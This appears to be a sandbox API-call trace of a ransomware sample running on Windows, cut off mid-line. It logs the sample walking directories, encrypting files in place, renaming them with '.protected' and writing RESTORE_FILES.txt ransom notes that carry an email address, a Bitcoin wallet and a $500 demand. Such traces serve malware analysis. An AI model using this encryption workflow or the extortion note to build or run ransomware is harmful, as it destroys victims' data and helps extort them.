[0072.963] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".protected") returned 0x0 [0072.963] lstrcmpW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="RESTORE_FILES.txt") returned 1 [0072.963] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.965] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.965] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0073.081] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.081] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".txt") returned 0x0 [0073.081] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.081] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".rar") returned 0x0 [0073.081] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.081] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".zip") returned 0x0 [0073.081] ReadFile (in: hFile=0x14c, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.208] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.209] WriteFile (in: hFile=0x14c, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.209] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.209] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0073.210] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0073.210] CloseHandle (hObject=0x14c) returned 1 [0073.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 131 [0073.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.protected")) returned 1 [0073.211] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0073.211] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0073.211] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 110 [0073.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.211] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.211] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0073.213] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.213] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0073.213] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.213] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0073.214] CloseHandle (hObject=0xd8) returned 1 [0073.214] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.214] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.214] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt") returned 106 [0073.214] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.214] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.214] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.215] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.215] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.215] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.215] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0073.215] CloseHandle (hObject=0xd4) returned 1 [0073.216] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.216] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.217] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt") returned 100 [0073.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.219] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.219] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.220] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.220] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.220] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.220] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0073.220] CloseHandle (hObject=0xb4) returned 1 [0073.220] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.220] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.221] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt") returned 91 [0073.221] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.221] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.221] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.222] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.222] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.222] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.222] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0073.222] CloseHandle (hObject=0xa4) returned 1 [0073.222] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Windows") returned -1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files") returned -1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files (x86)") returned -1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="$Recycle.bin") returned 1 [0073.222] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="System Volume Information") returned -1 [0073.222] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 73 [0073.222] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2=".") returned 1 [0073.222] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="..") returned 1 [0073.222] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*") returned 75 [0073.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.223] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.223] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.223] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.223] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.223] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.223] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\.") returned 75 [0073.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.223] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.223] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.223] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.223] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.223] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.224] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.224] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\..") returned 76 [0073.224] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.224] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.224] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0073.224] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0073.224] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned 82 [0073.224] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0073.224] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0073.224] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*") returned 84 [0073.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0073.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.224] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\.") returned 84 [0073.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.224] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.225] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 